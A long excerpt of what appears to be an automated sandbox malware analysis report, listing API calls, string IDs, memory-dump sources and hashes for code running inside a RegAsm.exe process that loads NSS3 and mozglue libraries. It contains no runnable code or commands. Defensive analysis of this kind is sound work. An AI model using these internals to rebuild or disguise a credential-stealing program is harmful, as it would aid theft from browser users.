                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$n,l
                                                                                                        • API String ID: 1003633598-1108940891
                                                                                                        • Opcode ID: a96edf955e15a91ac68d85a44303449d3a0f92f8f4aaea6802cfefa5cf635fe0
                                                                                                        • Instruction ID: 462f7a5d693f4c77310debef644fe01116ad983998fabc0769b5ba3ac5bfed5f
                                                                                                        • Opcode Fuzzy Hash: a96edf955e15a91ac68d85a44303449d3a0f92f8f4aaea6802cfefa5cf635fe0
                                                                                                        • Instruction Fuzzy Hash: 5321E63570054C9FDB00DB659D8AB9E37B9EB4A328F854029ED09D7F02DB35A948CBD2
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C093492
                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C0934A9
                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C0934EF
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C09350E
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C093522
                                                                                                        • __aulldiv.LIBCMT ref: 6C093552
                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C09357C
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C093592
                                                                                                          • Part of subcall function 6C0CAB89: EnterCriticalSection.KERNEL32(6C11E370,?,?,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284), ref: 6C0CAB94
                                                                                                          • Part of subcall function 6C0CAB89: LeaveCriticalSection.KERNEL32(6C11E370,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C0CABD1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                        • API String ID: 3634367004-706389432
                                                                                                        • Opcode ID: 594c3f10d3acda162c54ae17ad5dca2492203fd17942da350b00baf87ae3001e
                                                                                                        • Instruction ID: 0f1fbfa335ff243940626682552d0958440e0ba35884cf58d15db924804d3986
                                                                                                        • Opcode Fuzzy Hash: 594c3f10d3acda162c54ae17ad5dca2492203fd17942da350b00baf87ae3001e
                                                                                                        • Instruction Fuzzy Hash: 963170B1F012059BDF04DFB9CA49BAE77F9FB49304F104029E51593B60DA78A905EF61
                                                                                                        APIs
                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C1FDE64), ref: 6C1FED0C
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1FED22
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C1FED4A
                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C1FED6B
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1FED38
                                                                                                          • Part of subcall function 6C134C70: TlsGetValue.KERNEL32(?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134C97
                                                                                                          • Part of subcall function 6C134C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CB0
                                                                                                          • Part of subcall function 6C134C70: PR_Unlock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CC9
                                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C1FED52
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1FED83
                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C1FED95
                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C1FED9D
                                                                                                          • Part of subcall function 6C2164F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C21127C,00000000,00000000,00000000), ref: 6C21650E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                        • String ID: security
                                                                                                        • API String ID: 3323615905-3315324353
                                                                                                        • Opcode ID: ca5ecf0a5f16505141d990db718eb7777e1247dc48ec2f94ca585f2530c6632d
                                                                                                        • Instruction ID: 43b56fb001bb90bfb07e1aaca6ae681a46d534e2f17c70863feee7d15061fb70
                                                                                                        • Opcode Fuzzy Hash: ca5ecf0a5f16505141d990db718eb7777e1247dc48ec2f94ca585f2530c6632d
                                                                                                        • Instruction Fuzzy Hash: 8D116A769442186BE7205625AC84BBF72F8EF52B0CF010435ED2463E41FB29A60DC6F7
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(Aborting,?,6C1A2357), ref: 6C2C0EB8
                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C1A2357), ref: 6C2C0EC0
                                                                                                        • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C2C0EE6
                                                                                                          • Part of subcall function 6C2C09D0: PR_Now.NSS3 ref: 6C2C0A22
                                                                                                          • Part of subcall function 6C2C09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C2C0A35
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C2C0A66
                                                                                                          • Part of subcall function 6C2C09D0: PR_GetCurrentThread.NSS3 ref: 6C2C0A70
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C2C0A9D
                                                                                                          • Part of subcall function 6C2C09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C2C0AC8
                                                                                                          • Part of subcall function 6C2C09D0: PR_vsmprintf.NSS3(?,?), ref: 6C2C0AE8
                                                                                                          • Part of subcall function 6C2C09D0: EnterCriticalSection.KERNEL32(?), ref: 6C2C0B19
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C2C0B48
                                                                                                          • Part of subcall function 6C2C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C2C0C76
                                                                                                          • Part of subcall function 6C2C09D0: PR_LogFlush.NSS3 ref: 6C2C0C7E
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C2C0EFA
                                                                                                          • Part of subcall function 6C1AAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C1AAF0E
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F16
                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F1C
                                                                                                        • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F25
                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F2B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                        • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                        • API String ID: 3905088656-1374795319
                                                                                                        • Opcode ID: aaab96c4a8d6de4bf881ebe9ebe1b6e3f7f7d14f0e405604006408353cadccaa
                                                                                                        • Instruction ID: 4d9479f470cb9a18668856503c606ec390c0adc645180b002e38d396ddbbfa03
                                                                                                        • Opcode Fuzzy Hash: aaab96c4a8d6de4bf881ebe9ebe1b6e3f7f7d14f0e405604006408353cadccaa
                                                                                                        • Instruction Fuzzy Hash: 9AF0A4F6A001187BDA007BA0AC49C9B3E2DDF46664F004028FE0956602DB76E915D6B3
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00426634
                                                                                                        • _free.LIBCMT ref: 00426642
                                                                                                        • _free.LIBCMT ref: 0042664D
                                                                                                        • _free.LIBCMT ref: 00426621
                                                                                                          • Part of subcall function 0041D93B: HeapFree.KERNEL32(00000000,00000000,?,0041D18F,00000000,0043B6F4,0041D1D6,0040EEBE,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4), ref: 0041D951
                                                                                                          • Part of subcall function 0041D93B: GetLastError.KERNEL32(?,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4,?,?,?), ref: 0041D963
                                                                                                        • ___free_lc_time.LIBCMT ref: 0042666B
                                                                                                        • _free.LIBCMT ref: 00426676
                                                                                                        • _free.LIBCMT ref: 0042669B
                                                                                                        • _free.LIBCMT ref: 004266B2
                                                                                                        • _free.LIBCMT ref: 004266C1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                        • String ID: xLC
                                                                                                        • API String ID: 3704779436-381350105
                                                                                                        APIs
                                                                                                        • PORT_NewArena_Util.NSS3(00000400), ref: 6C224DCB
                                                                                                          • Part of subcall function 6C210FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211000
                                                                                                          • Part of subcall function 6C210FF0: PR_NewLock.NSS3(?,00000800,6C1AEF74,00000000), ref: 6C211016
                                                                                                          • Part of subcall function 6C210FF0: PL_InitArenaPool.NSS3(00000000,security,6C1B87ED,00000008,?,00000800,6C1AEF74,00000000), ref: 6C21102B
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C224DE1
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C224DFF
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C224E59
                                                                                                          • Part of subcall function 6C20FAB0: free.MOZGLUE(?,-00000001,?,?,6C1AF673,00000000,00000000), ref: 6C20FAC7
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C2E300C,00000000), ref: 6C224EB8
                                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C224EFF
                                                                                                        • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C224F56
                                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C22521A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 1025791883-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$moz_xmalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3009372454-0
                                                                                                        APIs
                                                                                                        • PR_NewLock.NSS3(00000001,00000000,6C300148,?,6C1C6FEC), ref: 6C1B502A
                                                                                                        • PR_NewLock.NSS3(00000001,00000000,6C300148,?,6C1C6FEC), ref: 6C1B5034
                                                                                                        • PL_NewHashTable.NSS3(00000000,6C20FE80,6C20FD30,6C25C350,00000000,00000000,00000001,00000000,6C300148,?,6C1C6FEC), ref: 6C1B5055
                                                                                                        • PL_NewHashTable.NSS3(00000000,6C20FE80,6C20FD30,6C25C350,00000000,00000000,?,00000001,00000000,6C300148,?,6C1C6FEC), ref: 6C1B506D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HashLockTable
                                                                                                        • String ID:
                                                                                                        • API String ID: 3862423791-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                        • String ID:
                                                                                                        • API String ID: 1192971331-0
                                                                                                        APIs
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C152F3D
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C152FB9
                                                                                                        • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C153005
                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C1530EE
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C153131
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C153178
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memsetsqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                        • API String ID: 984749767-598938438
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __allrem
                                                                                                        • String ID: @,l$P,l$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$,l
                                                                                                        • API String ID: 2933888876-2868315259
                                                                                                        APIs
                                                                                                        • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,039E2548), ref: 0041B9C5
                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0041BA3E
                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BA5A
                                                                                                        • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041BA6E
                                                                                                        • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BA77
                                                                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BA87
                                                                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BAA5
                                                                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BAB5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$PointerRead$HandleInformationSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2979504256-3916222277
                                                                                                        • Opcode ID: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
                                                                                                        • Instruction ID: 2f96ef8e8c352da0c6fd23b8bc0b50d76e073618b9a0ce70252d9e73764e8c17
                                                                                                        • Opcode Fuzzy Hash: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
                                                                                                        • Instruction Fuzzy Hash: 4A51F3B1D0021CAFDB28DF99DC85AEEBBB9EF04344F10442AE511E6260D7789D85CF94
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0040DBBB
                                                                                                        • strchr.MSVCRT ref: 0040DBCD
                                                                                                        • strchr.MSVCRT ref: 0040DBF2
                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
                                                                                                        • strcpy_s.MSVCRT ref: 0040DC6F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
                                                                                                        • String ID: 0123456789ABCDEF$`Tu
                                                                                                        • API String ID: 453150750-1497512213
                                                                                                        • Opcode ID: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
                                                                                                        • Instruction ID: be699800860e389eb7f033a368984428232de7924aec9246af203248711cb49e
                                                                                                        • Opcode Fuzzy Hash: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
                                                                                                        • Instruction Fuzzy Hash: 18315D71D002199FDB00DFE8DC49ADEBBB9AF09355F100179E901FB281DB79A909CB94
                                                                                                        APIs
                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C1B0F62
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C1B0F84
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,6C1CF59B,6C2D890C,?), ref: 6C1B0FA8
                                                                                                        • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C1B0FC1
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C1B0FDB
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1B0FEF
                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C1B1001
                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C1B1009
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                        • String ID: security
                                                                                                        • API String ID: 2061345354-3315324353
                                                                                                        • Opcode ID: d5d6f3662e5b7b2ad21acffe32019734808aaf05483b4bc202533091b6295057
                                                                                                        • Instruction ID: 2c43538e0b6848c0e5ac665d26ea00742f4f8a6a83b3645fbfc6b555131d563a
                                                                                                        • Opcode Fuzzy Hash: d5d6f3662e5b7b2ad21acffe32019734808aaf05483b4bc202533091b6295057
                                                                                                        • Instruction Fuzzy Hash: ED2136B1A04208ABE7109F24DC81AAFB7B8EF5465CF108519FC1896B01FB31D915CBE2
                                                                                                        APIs
                                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,6C1B7D8F,6C1B7D8F,?,?), ref: 6C1B6DC8
                                                                                                          • Part of subcall function 6C20FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C20FE08
                                                                                                          • Part of subcall function 6C20FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C20FE1D
                                                                                                          • Part of subcall function 6C20FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C20FE62
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C1B7D8F,?,?), ref: 6C1B6DD5
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C2D8FA0,00000000,?,?,?,?,6C1B7D8F,?,?), ref: 6C1B6DF7
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C1B6E35
                                                                                                          • Part of subcall function 6C20FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C20FE29
